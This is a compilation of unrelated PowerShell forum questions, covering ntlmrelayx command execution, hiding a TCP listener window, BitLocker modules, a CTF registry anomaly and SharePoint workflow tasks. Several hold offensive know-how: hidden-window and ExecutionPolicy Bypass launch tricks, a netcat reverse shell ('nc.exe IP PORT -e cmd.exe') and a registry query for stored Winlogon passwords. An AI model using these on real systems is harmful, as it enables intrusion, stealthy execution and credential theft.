ntlmrelayx powershell usage

I would like to know about your experience regarding the use of ntlmrelayx

When using ntlmrelayx.py -tf targets.txt -c "Powershell command" does this powershell command need to be an Empire launcher or can it be any powershell command like a powershell one-liner?

Thanks

How to hide tcp port listener powershell script?

GOALS: run a powershell script without showing the window (it’s ok if it pops up for few seconds).

PROBLEM: the script tcplisten.ps1 works only if the window is displayed to the user. All the attempts below don’t work, because when I run netstat -ano -p tcp, port 9999 is not listening.

tcplisten.ps1

$Listener = [System.Net.Sockets.TcpListener]9999; $Listener.Start()

ATTEMPTS:

powershell.exe

powershell.exe -windowstyle hidden .\tcplisten.ps1 

hidden -command

powershell -windowstyle hidden -command $Listener = [System.Net.Sockets.TcpListener]9999; $Listener.Start()

-NoProfile -NonInteractive -ExecutionPolicy Bypass

powershell -NoP -NonI -W Hidden -Exec Bypass -Command 

Start-Process

Start-Process powershell.exe -ArgumentList "-WindowsStyle hidden -file .\tcplisten.ps1" 

vbs script

Create a .vbs with this script and run it

command = "powershell.exe -nologo -command C:\Users\Utente\Desktop\tcplisten.ps1"
set shell = CreateObject("WScript.Shell")
shell.Run command,0

QUESTION: is there a solution? Am I making some mistake?

Bitlocker Powershell Module

I’m new to the topic of Powershell modules in general: finding them, downloading them (or finding/installing them from the internet using find-module and install-module, etc.). But I specifically need information at the moment about finding/installing the bitlocker module. I see numerous forum references to the cmdlets in this module but no one mentions the module itself. ‘Install-module bitlocker’ errors out with ‘No match was found’ for that module name. I’m doing this from a Windows 2016 server.

Powershell (WinRM) and cmd.exe: reg query output deviation

During a CTF I encountered the following anomaly regarding PS & cmd.exe:

  • I got access to a Windows x86 server through WinRM Port 5985 using evil-winrm. (https://github.com/Hackplayers/evil-winrm) This spawns a PS shell.
  • Via the PS shell I transferred nc.exe to the machine and used cmd.exe /c “nc.exe IP PORT -e cmd.exe” to spawn an additional regular cmd.exe shell back to me.

I searched the registry for stored passwords using the following command: reg query “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”

This is where I noticed that the PS shell reg query returns considerably more output than the cmd.exe reg query. PS includes the “DefaultPassword” entry, whereas cmd.exe does not include this value.

The full output deviation is captured in the following screenshot: reg query on powershell shows more entries than reg query on cmd.exe. The same behavior is observable for other registry items. PS generally returns more elements than the cmd.exe “sub-shell”.

Any hints to why this behavior occurs are greatly appreciated.

Powershell script to get workflow tasks for each list item

I have a large number of webs (sub-sites) within a site collection that have lists whose list items have Approval workflows running on them.

How would I get all tasks for each list item in powershell? I see that the “tasks” list has the ‘Related Content’ column which has the title of the list item. How do I do a union between the two lists (the task list and the item list) in powershell?

Thanks for your help!